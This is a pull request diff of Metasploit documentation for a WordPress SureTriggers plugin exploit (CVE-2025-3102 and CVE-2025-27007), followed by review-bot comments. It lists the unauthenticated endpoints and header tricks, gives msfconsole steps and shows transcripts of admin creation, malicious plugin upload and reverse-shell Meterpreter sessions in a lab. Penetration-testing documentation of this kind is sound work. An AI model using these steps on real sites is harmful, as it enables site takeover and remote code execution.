Add CVE-2025-27007 in existing exploit(multi/http/wp_suretriggers_auth_bypass) module #20187

Open
wants to merge 1 commit into
base: master
224 changes: 136 additions & 88 deletions documentation/modules/exploit/multi/http/wp_suretriggers_auth_bypass.md
@@ -1,17 +1,28 @@
## Vulnerable Application

This Metasploit module exploits an administrative user creation vulnerability in the
WordPress SureTriggers plugin, versions <= 1.0.78 (CVE-2025-3102).
The plugin exposes an unauthenticated REST endpoint (`automation/action`) that allows
bypassing permission checks to create a new administrator account.
This Metasploit module exploits administrative user creation vulnerabilities in the
WordPress SureTriggers/OttoKit plugin:

To replicate a vulnerable environment for testing:
* **CVE-2025-3102** (≤ 1.0.78): unauthenticated admin creation via the `automation/action`
REST endpoint with an empty `St-Authorization: Bearer ` header.
* **CVE-2025-27007** (≤ 1.0.82): unauthenticated reset of the access key via the `connection/create-wp-connection` endpoint,
followed by admin creation using `St-Authorization: Bearer <NEW_KEY>`.

1. Install WordPress using the provided Docker Compose configuration.
2. Download and install the SureTriggers plugin v1.0.78:
[https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip](https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip)
3. Verify that the plugin is activated and accessible on the local network.
4. No further configuration is required; vulnerability is present immediately upon activation.
### To replicate vulnerable environments

1. **SureTriggers v1.0.78 (CVE-2025-3102)**

* Download & install plugin v1.0.78:
`https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip`
* No additional setup is required; the bypass works immediately upon activation.

2. **SureTriggers v1.0.82 (CVE-2025-27007)**

* Download & install plugin v1.0.82:
`https://downloads.wordpress.org/plugin/suretriggers.1.0.82.zip`
* No secret key is needed; the exploit will reset it to the specified value.

Both scenarios can be deployed via Docker Compose.

## Docker Compose Configuration
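Review bot: the two version ranges in this hunk overlap, since "≤ 1.0.82" for CVE-2025-27007 includes the 1.0.78 build used for the CVE-2025-3102 scenario, yet nothing here says whether the ACTION must be picked manually or is selected by the check; a sentence such as "v1.0.78 is in scope for both CVEs; the ACTION option selects which path the module takes" would settle it. "The exploit will reset it to the specified value" under scenario 2 should name the option it refers to (ACCESS_KEY). Style: the sub-bullets under the two numbered items are not indented, so they render as a separate flat list instead of nested items; indent them by three spaces.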

@@ -62,131 +73,168 @@ post_max_size = 64M
```bash
docker-compose up -d
```

2. Complete WordPress setup at [http://localhost:5555](http://localhost:5555)
3. Confirm that SureTriggers v1.0.78 is active under **Plugins**
4. Launch `msfconsole`
5. Load the module:
2. Complete WordPress setup at [http://localhost:5555](http://localhost:5555).
3. Confirm the targeted SureTriggers version is active under **Plugins**.
4. In `msfconsole`:

```bash
use exploit/multi/http/wp_suretriggers_auth_bypass
```

6. Set `RHOSTS` to the target IP
7. Optionally set `ST_AUTH` if you have an existing key
8. Configure `WP_USER`, `WP_PASS`, `WP_EMAIL`
9. Execute the exploit with `run`

## Options

* **RHOSTS**: Target IP address or hostname where WordPress is running.
* **TARGETURI**: Base path to the WordPress installation (default is `/`).
* **WP_USER**, **WP_PASS**, **WP_EMAIL**: Credentials for the new administrator account that the exploit will create.
By default these are randomly generated but you can set them to values of your choice, for example:

```bash
set RHOSTS 127.0.0.1
set TARGETURI /
set WP_USER eviladmin
set WP_PASS Str0ngP@ss!
set WP_EMAIL [email protected]
```

* **ST_AUTH**: *(Optional)* If you have the plugin’s secret key (used in the `st_authorization` header),
you can provide it here to authenticate the REST request.
If left empty the module will send an empty header value, which still works on versions <= 1.0.78.

## Scenarios
## Options

### Successful Exploitation Against SureTriggers v1.0.78
* **WP_USER**, **WP_PASS**, **WP_EMAIL**: New administrator credentials (random by default).
* **ST_AUTH**: *(Optional)* Value for `St-Authorization` header (used by CVE-2025-3102; default empty).
* **ACCESS_KEY**: *(Optional)* Key to reset for CVE-2025-27007 (random by default).
* **ACTION**: Exploit to perform:

**Setup:**
* `CVE-2025-3102`
* `CVE-2025-27007`

* Local WordPress instance with SureTriggers v1.0.78
* Metasploit Framework
## Scenarios

**Steps:**
### CVE-2025-3102: Empty Bearer Admin Creation

1. Start `msfconsole`
1. Ensure SureTriggers v1.0.78 is active.
2. In `msfconsole`, set:

2. Load the module:
```bash
use exploit/multi/http/wp_suretriggers_auth_bypass
set ACTION CVE-2025-3102
```
3. Configure:
3. Run the module: it will send an empty `St-Authorization: Bearer ` header to `/wp-json/sure-triggers/v1/automation/action`.
4. New administrator is created; payload is uploaded and executed.

### CVE-2025-27007: Reset Access Key & Admin Creation

1. Ensure SureTriggers v1.0.82 is active.
2. In `msfconsole`, set:

```bash
set RHOSTS 127.0.0.1
set TARGETURI /
set WP_USER eviladmin
set WP_PASS Str0ngP@ss!
run
set ACTION CVE-2025-27007
```
3. Run the module: it will call `/wp-json/sure-triggers/v1/connection/create-wp-connection` to reset the key, then use
`St-Authorization: Bearer mynewkey123` against `/wp-json/sure-triggers/v1/automation/action`.
4. New administrator is created; payload is uploaded and executed.

**Expected Results**:

### Expected Results (CVE-2025-3102)

With `php/meterpreter/reverse_tcp`:

```plaintext
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://127.0.0.1:5555
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
[*] Started reverse TCP handler on 192.168.1.36:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected WordPress version: 6.3.2
[+] Detected suretriggers plugin version: 1.0.78
[+] The target appears to be vulnerable.
[*] Attempting to create administrator user via auth bypass...
[!] Primary endpoint failed or did not return success, trying fallback via rest_route...
[+] Administrator created: sol_bash:k9R0ZwjRX5VBOBJ
[*] Detected WordPress version: 6.8.1
[+] The target appears to be vulnerable. Detected suretriggers version 1.0.78 (vulnerable to CVE-2025-3102)
[*] CVE-2025-3102: creating admin via St-Authorization Bearer (empty)
[+] Admin created: zGrsYO:8XL0pZKjN7pc
[*] Uploading malicious plugin for code execution...
[*] Executing payload at /wp-content/plugins/wp_p2ash/ajax_efdsa.php...
[*] Sending stage (40004 bytes) to 172.27.0.2
[+] Deleted ajax_efdsa.php
[+] Deleted wp_p2ash.php
[+] Deleted ../wp_p2ash
[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 172.27.0.2:33924) at 2025-05-07 17:22:49 +0200
[*] Executing payload at /wp-content/plugins/wp_63rkh/ajax_fybgc.php...
[*] Sending stage (40004 bytes) to 172.27.0.3
[+] Deleted ajax_fybgc.php
[+] Deleted wp_63rkh.php
[+] Deleted ../wp_63rkh
[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.27.0.3:51410) at 2025-05-14 19:00:30 +0200

meterpreter > sysinfo
Computer : a6e792b1c252
OS : Linux a6e792b1c252 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64
Computer : 396e678f2510
OS : Linux 396e678f2510 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64
Meterpreter : php/linux
```

With `cmd/linux/http/x64/meterpreter/reverse_tcp`:

```plaintext
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > show targets
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set target 1
target => 1
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
[*] Started reverse TCP handler on 192.168.1.36:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected WordPress version: 6.8.1
[+] The target appears to be vulnerable. Detected suretriggers version 1.0.78 (vulnerable to CVE-2025-3102)
[*] CVE-2025-3102: creating admin via St-Authorization Bearer (empty)
[+] Admin created: zGrsYO:8XL0pZKjN7pc
[*] Uploading malicious plugin for code execution...
[*] Executing payload at /wp-content/plugins/wp_exf15/ajax_tpfd9.php...
[*] Sending stage (3045380 bytes) to 172.27.0.3
[+] Deleted ajax_tpfd9.php
[+] Deleted wp_exf15.php
[+] Deleted ../wp_exf15
[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 172.27.0.3:53324) at 2025-05-14 19:02:06 +0200

meterpreter > sysinfo
Computer : 172.27.0.3
OS : Debian 12.10 (Linux 6.14.2-2-cachyos)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
```

Exploit targets:
=================
### Expected Results (CVE-2025-27007)

Id Name
-- ----
=> 0 PHP In-Memory
1 Unix In-Memory
2 Windows In-Memory
With `php/meterpreter/reverse_tcp`:

```plaintext
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set action CVE-2025-27007
action => CVE-2025-27007
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
[*] Started reverse TCP handler on 192.168.1.36:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected WordPress version: 6.8.1
[+] The target appears to be vulnerable. Detected suretriggers version 1.0.82 (vulnerable to CVE-2025-27007)
[*] CVE-2025-27007: reset access key & create admin
[*] Resetting access key
[+] Access key reset successful
[+] Admin created: pAEaR3:98TCYzILsdXt
[*] Uploading malicious plugin for code execution...
[*] Executing payload at /wp-content/plugins/wp_14slj/ajax_drh8b.php...
[*] Sending stage (40004 bytes) to 172.27.0.3
[+] Deleted ajax_drh8b.php
[+] Deleted wp_14slj.php
[+] Deleted ../wp_14slj
[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.27.0.3:42464) at 2025-05-14 19:05:06 +0200

meterpreter > sysinfo
Computer : 396e678f2510
OS : Linux 396e678f2510 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64
Meterpreter : php/linux
```

With `cmd/linux/http/x64/meterpreter/reverse_tcp`:

```plaintext
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set target 1
target => 1
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://127.0.0.1:5555
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
[*] Started reverse TCP handler on 192.168.1.36:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected WordPress version: 6.3.2
[+] Detected suretriggers plugin version: 1.0.78
[+] The target appears to be vulnerable.
[*] Attempting to create administrator user via auth bypass...
[!] Primary endpoint failed or did not return success, trying fallback via rest_route...
[+] Administrator created: sol_bash:k9R0ZwjRX5VBOBJ
[*] Detected WordPress version: 6.8.1
[+] The target appears to be vulnerable. Detected suretriggers version 1.0.82 (vulnerable to CVE-2025-27007)
[*] CVE-2025-27007: reset access key & create admin
[*] Resetting access key
[+] Access key reset successful
[+] Admin created: pAEaR3:98TCYzILsdXt
[*] Uploading malicious plugin for code execution...
[*] Executing payload at /wp-content/plugins/wp_ppqii/ajax_cqc8l.php...
[*] Sending stage (3045380 bytes) to 172.27.0.2
[+] Deleted ajax_cqc8l.php
[+] Deleted wp_ppqii.php
[+] Deleted ../wp_ppqii
[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 172.27.0.2:54238) at 2025-05-07 17:24:10 +0200
[*] Executing payload at /wp-content/plugins/wp_c7ziw/ajax_a9arm.php...
[*] Sending stage (3045380 bytes) to 172.27.0.3
[+] Deleted ajax_a9arm.php
[+] Deleted wp_c7ziw.php
[+] Deleted ../wp_c7ziw
[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 172.27.0.3:54362) at 2025-05-14 19:06:04 +0200

meterpreter > sysinfo
Computer : 172.27.0.2
OS : Debian 11.8 (Linux 6.14.2-2-cachyos)
Computer : 172.27.0.3
OS : Debian 12.10 (Linux 6.14.2-2-cachyos)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
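Review bot: step 3 of the CVE-2025-27007 scenario hardcodes `St-Authorization: Bearer mynewkey123`, but the Options section says ACCESS_KEY is random by default and the scenario never sets it, so either write the header as `St-Authorization: Bearer <ACCESS_KEY>` (matching the `<NEW_KEY>` placeholder in the description) or add `set ACCESS_KEY mynewkey123` to the snippet above it. Removing the RHOSTS and TARGETURI entries together with the `set RHOSTS` / `set TARGETURI` example leaves the page with no statement of how the target is specified beyond the `run http://lab:5555` in the transcripts; keep a one-line entry for each. The first cmd/linux transcript runs `show targets` but its output is not shown while the old "Exploit targets" table was deleted; either drop the command or keep the table. Step 4 of both scenarios and the transcripts show only the uploaded plugin files being deleted, so a note that the created administrator account persists on the target and has to be removed by hand after testing belongs in the Scenarios section.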